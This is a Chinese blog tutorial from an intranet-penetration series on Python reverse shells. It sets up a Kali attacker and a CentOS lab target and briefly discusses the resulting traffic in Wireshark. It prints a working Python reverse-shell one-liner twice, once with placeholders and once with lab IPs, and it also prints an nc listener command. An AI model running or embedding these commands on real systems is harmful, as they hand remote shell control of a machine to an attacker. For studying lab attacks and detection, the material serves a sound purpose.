[隧道代理] 隧道代理 — 反弹 Shell - Python 反弹 Shell

关注这个专栏的其他相关笔记:[内网安全] 内网渗透 - 学习手册-CSDN博客

0x01:Python 工具介绍

Python 是一种高级、解释型、通用的编程语言,由 Guido van Rossum 于 1991 年首次发布。它以简洁、易读的语法著称,适合初学者和专业开发者。Python 支持多种编程范式,包括面向对象、函数式和过程式编程。

大部分的 Linux 系统中都默认安装了 Python,笔者看了大部分使用 Python 做反弹 Shell 的代码,其本质依旧是使用 Linux 中的 /bin/bash 来做反弹连接(笔者其实想整一个针对 Windows 的,但是仔细想了想,Windows 好像真没啥自带的能做反弹连接的工具,纠正一下,笔者现在没找到)。虽然没有找到,但 Python 作为一款支持网络编程的语言,写个互通的工具应该还是挺简单的吧。

0x0101:定位本地 Python 环境

要想使用 Python 进行反弹 Shell,首先得确定靶机上存在 Python 环境呀,使用下面的命令就可以完成这一操作:

bash 复制代码
 python -V                    # 适合 Windows Or Linux
 which python python2 python3 # 适合 Linux

0x0102:Python 反弹 Shell 标准格式

下面这个就是在 Linux 系统中使用 Python 进行反弹 Shell 的标准语法:

bash 复制代码
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机 IP",攻击机端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"]);'

0x02:Python 反弹 Shell

这里使用的 Python 反弹 Shell,由于是其本质是借助 /bin/bash,所以和 bash 一样,只能用于反向连接,不能用于正向连接。对于正向连接与反向连接的使用场景,相信看过前面 NetCat(NC)反弹 Shell 的小伙伴都已经很清楚了,所以笔者这里就不费笔墨讲解场景了,直接开始实验。

0x0201:Python 反弹 Shell --- 实验流程

复现环境

  • 攻击机 Kali Linux:IP 192.168.0.102

  • 靶机 CentOS7:IP 192.168.0.105

首先,在攻击机中执行如下命令,监听本机的 9999 端口,等待靶机自己上钩:

bash 复制代码
 nc -lvvp 9999

然后来到靶机中,执行如下命令,将自己的控制权移交给攻击者的 9999 端口:

bash 复制代码
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.102",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"]);'

此时我们回到 Kali 攻击机中,可以看到靶机成功上线:

0x0201:Python 反弹 Shell --- 流量分析

接下来我们就以上面我们通过 Python 反弹 Shell 在靶机上执行 ifconfig 命令为例,来分析一下 Python 反弹 Shell 的流量特征。

在 Kali Linux 中打开 WireShark,并重新在反弹 Shell 的界面中输入 ifconfig 后进行抓包:

跟我们前面分析的一样,上面这种一句话使用 Python 反弹 Shell 的本质其实还是借助 bash 进行反弹的,流量特征与走 TCP 流量的 Bash 反弹连接是一致的(所以说呢,安全任重而道远,后面笔者会尝试更新如何自制客户端与服务端,并对流量进行混淆,以尝试绕过安全设备)。

相关推荐
用户9623779544810 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机13 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机13 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户9623779544815 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star15 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户9623779544818 小时前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher2 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
郑州光合科技余经理5 天前
代码展示:PHP搭建海外版外卖系统源码解析
java·开发语言·前端·后端·系统架构·uni-app·php
一次旅行5 天前
网络安全总结
安全·web安全
feifeigo1235 天前
matlab画图工具
开发语言·matlab